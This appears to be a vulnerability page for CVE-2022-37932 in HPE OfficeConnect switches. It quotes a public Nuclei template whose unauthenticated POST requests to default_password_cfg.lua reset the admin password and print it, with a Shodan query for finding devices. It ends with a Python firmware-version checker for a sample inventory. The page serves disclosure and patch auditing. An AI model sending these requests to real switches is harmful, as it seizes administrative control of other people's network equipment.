A potential security vulnerability has been identified in Hewlett Packard Enterprise OfficeConnect 1820, 1850, and 1920S network switches. The vulnerability could be remotely exploited to allow authentication bypass. HPE has released software updates that resolve the vulnerability. Affected versions: prior to PT.02.14; prior to PC.01.22; prior to PO.01.21; prior to PD.02.22.
PoC code [public]
id: CVE-2022-37932

info:
  name: HP Switch - Authentication Bypass
  author: Phulelouch
  severity: high
  description: |
    A potential security vulnerability has been identified in Hewlett Packard Enterprise OfficeConnect 1820, 1850, and 1920S Network switches. The vulnerability could be remotely exploited to allow authentication bypass. HPE has made the following software updates to resolve the vulnerability in Hewlett Packard Enterprise OfficeConnect 1820, 1850 and 1920S Network switches versions- Prior to PT.02.14; Prior to PC.01.22; Prior to PO.01.21; Prior to PD.02.22;
  impact: |
    Attackers on the adjacent network can bypass authentication on HP OfficeConnect switches without credentials, potentially gaining administrative access to modify switch configurations, intercept network traffic, or disrupt network operations.
  remediation: |
    Update to HPE OfficeConnect switch firmware version PT.02.14 or later for 1820 series, PC.01.22 or later for 1850 series, or PO.01.21/PD.02.22 or later for 1920S series.
  classification:
    cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2022-37932
    epss-score: 0.79616
    epss-percentile: 0.9905
    cpe: cpe:2.3:o:hpe:officeconnect_1820_j9979a_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: hpe
    product: officeconnect_1820_j9979a_firmware
    shodan-query: html:"HPE OfficeConnect"
  tags: cve,cve2022,hp,officeconnect,auth-bypass,intrusive,vkev,vuln

variables:
  password: "{{rand_base(8)}}"

flow: http(1) && (http(2) || http(3))

http:
  - method: GET
    path:
      - "{{BaseURL}}/"

    redirects: true
    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(body, '<title>HPE OfficeConnect Switch 1920')"
        condition: and
        internal: true

  - raw:
      - |
        POST /login/default_password_cfg.lua HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=admin&oldPwd=&newPwd={{password}}&confirmPwd={{password}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "redirect")'
          - 'contains(content_type, "application/json")'
        condition: and

    extractors:
      - type: json
        name: redirect
        part: body
        json:
          - .redirect
        internal: true

      - type: dsl
        dsl:
          - '"Password:"+ password'
          - '"Login Path:"+ redirect'

  - raw:
      - |
        POST /htdocs/login/default_password_cfg.lua HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=admin&oldPwd=&newPwd={{password}}&confirmPwd={{password}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "redirect")'
          - 'contains(content_type, "application/json")'
        condition: and

    extractors:
      - type: json
        name: redirect
        part: body
        json:
          - .redirect
        internal: true

      - type: dsl
        dsl:
          - '"Password:"+ password'
          - '"Login Path:"+ redirect'
# digest: 490a004630440220717467d7e13b627a39e4691b205f64c445e7ce0364f6905b0040f305ca0e87ed0220513c91cba04f97db59c55a75f06b99cd19117878c6c4f98ceb4d835d2e91a1ed:922c64590222798bb761d5b6d8e72950
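
A switch inventory can be checked against the fixed releases named in the remediation text without sending the intrusive requests above. The following is an added example, not part of the original template or of any HPE tooling; it assumes firmware strings have the XX.NN.NN form shown on this page and that the two numeric fields compare as integers, and the inventory in it is constructed sample data.

```python
import re

# First fixed release per firmware prefix, from the remediation text on this page.
FIXED = {
    "PT": (2, 14),  # 1820 series
    "PC": (1, 22),  # 1850 series
    "PO": (1, 21),  # 1920S series
    "PD": (2, 22),  # 1920S series
}

# Assumption: versions look like "PT.02.14" (two letters, two numeric fields).
VERSION_RE = re.compile(r"^\s*([A-Za-z]{2})\.(\d+)\.(\d+)\s*$")


def parse_version(text):
    """Return (prefix, (major, minor)), or None if the string has another form."""
    m = VERSION_RE.match(text)
    if not m:
        return None
    return m.group(1).upper(), (int(m.group(2)), int(m.group(3)))


def classify(version):
    """Classify one firmware string as 'vulnerable', 'fixed' or 'unknown'."""
    parsed = parse_version(version)
    if parsed is None or parsed[0] not in FIXED:
        return "unknown"  # unrecognised prefix or format: review by hand
    prefix, number = parsed
    return "vulnerable" if number < FIXED[prefix] else "fixed"


def audit(inventory):
    """Map each host to (status, first fixed release it needs or None)."""
    report = {}
    for host, version in inventory.items():
        status, needed = classify(version), None
        if status == "vulnerable":
            prefix = parse_version(version)[0]
            needed = "%s.%02d.%02d" % ((prefix,) + FIXED[prefix])
        report[host] = (status, needed)
    return report


# Constructed sample inventory; hostnames and versions are made up.
SAMPLE = {"sw-floor1": "PT.02.13", "sw-floor2": "PC.01.22",
          "sw-lab": "pd.02.20", "sw-core": "YA.16.02"}

if __name__ == "__main__":
    for host, (status, needed) in sorted(audit(SAMPLE).items()):
        print(host, status, needed or "-")
```

Hosts reported as unknown carry a prefix or format the advisory text does not list and need a manual check against the vendor bulletin.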